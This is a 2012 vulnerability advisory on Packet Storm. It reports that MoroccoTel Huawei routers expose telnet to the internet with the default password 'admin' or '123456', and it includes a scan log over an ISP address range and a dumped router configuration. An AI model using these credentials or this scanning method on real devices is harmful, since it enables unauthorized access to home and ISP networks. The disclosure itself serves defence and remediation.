what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MoroccoTel Default Password

MoroccoTel Default Password
Posted Apr 25, 2012
Authored by Jerome Athias

MoroccoTel boxes suffer from an issue where there is a default password that can be used on the telnet server.

tags | exploit
SHA-256 | 15212df8a3a8d8b6ba16ec77025ef5e22d8dacfee6fd2ff769977b33b5b5fd46

MoroccoTel Default Password

Change Mirror Download
Hi,

a "vulnerability" was identified on MoroccoTel Boxes:
a telnet server is running, open to the web, with a default password of
admin (or 123456)

This critical vulnerability can affect the entire network of a Country.

Solution: change the default password account or modify the default firmware

NB: a new firmware was released, introducing a cipher on the "PPOE
password" (one common, publicly available PPOE account is largely used)

Discovered by NETpeas research team, NETpeas CERT is trying to contact
the ISP

More details:

Password:
telnettry
41.141.*.* -> Response telnet02: ****
Copyright (c) 2001 - 2006 Huawei
MT882a>
***********************************************************
41.141.*.* -> TELNET PASSWORD FOUND: admin

MT882a> show all

RAS version: V100R001B022 MoroccoTel 2010/02/26
System ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001 [Jun 02 2011
13:54:48]
romRasSize: 1217226
system up time: 2:45:45 (f2cc9 ticks)
bootbase version: VTC_SPI1.5| 2011/05/26


Hostname = MT882a
Message = <empty>
ip route mode = Yes
bridge mode = Yes
DHCP setting:
DHCP Mode = Server
Client IP Pool Starting Address = 192.168.1.2
Size of Client IP Pool = 64
Primary DNS Server = 8.8.8.8
Secondary DNS Server = 8.8.4.4
DHCP server leasetime = 86400
TCP/IP Setup:
IP Address = 192.168.1.1
IP Subnet Mask = 255.255.255.0
Rip Direction = None
Version = Rip-1
Multicast = IGMP-v2


RemoteNode = 0
Rem Node Name = ISP-0(ISP)
Encapsulation = PPPoE
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/35
IP Routing mode= Yes
Bridge mode = No
PPP Username = <snip>

PPP Password
41.141.*.* -> = *******
PPP Username_ext2 =
PPP Password_ext2 =
Service name =
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = Yes
Multicast = None
Default Route node = Yes

RemoteNode = 1
Rem Node Name = ISP-1
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel
41.141.1.9 -> Port 80 open
41.141.*.* -> active = Yes
VPI/VCI value = 0/35
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0

41.141.*.* -> IP address assignment type = Dynamic

41.141.*.* -> SUA = No
Multicast = None
Default Route node = No

RemoteNode = 2
Rem Node Name = ISP-2
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 3
Rem Node Name = ISP-3
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 4
Rem Node Name = ISP-4
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/81
IP Routing mode= No
Bridge mode = Yes
Remote IP
41.141.*.* -> Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 5
Rem Node Name = ISP-5
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/100
IP Routing mode= No
Bridge mode = Yes
Remote IP A
41.141.*.* -> ddr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
sMulticast = None

41.141.*.* -> yDefault Route node = No
s
RemoteNode = 6
aRem Node Name = ISP-6t
sEncapsulation = hRFC 1483

Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 1/39
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 7
Rem Node Name = ISP-7
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/16
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

MT882a>
RAS version : V100R001B022 MoroccoTel
romRasSize : 1217226
bootbase version : VTC_SPI1.5| 2011/05/26
Product Model : SmartAX

MAC Address : <snip-inclear>

Default Count
41.141.*.* -> ry Code : FF

Boot Module Debug Flag : 00

RomFile Version : 9F

RomFile Checksum : dceb

RAS F/W Checksum : 87b7

SNMP MIB level & OID : 050000000100000002000000030000000400000005

Main Feature Bits : 86

Other Feature Bits :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 13 00 00 00
MT882a>
41.141.*.* -> e
41.141.*.* -> ther config
--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID slot# n-line n-chann status line-cfg chann-cfg
00 0 1 2 0001 8042c8bc 8042c8d0
--------------- LINE DISPLAY ---------------------------
ID line# board-id n-chann chann-cfg
00 1 00 2 8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID chan# line-id board-id address name
00 1 00 00 804bf8a4 enet0
01 2 00 00 804bfe34 enet1
MT882a>


--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com
---------------------------------------------
Stay updated on Security: www.vulnerabilitydatabase.com

"The computer security is an art form. It's the ultimate martial art."

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close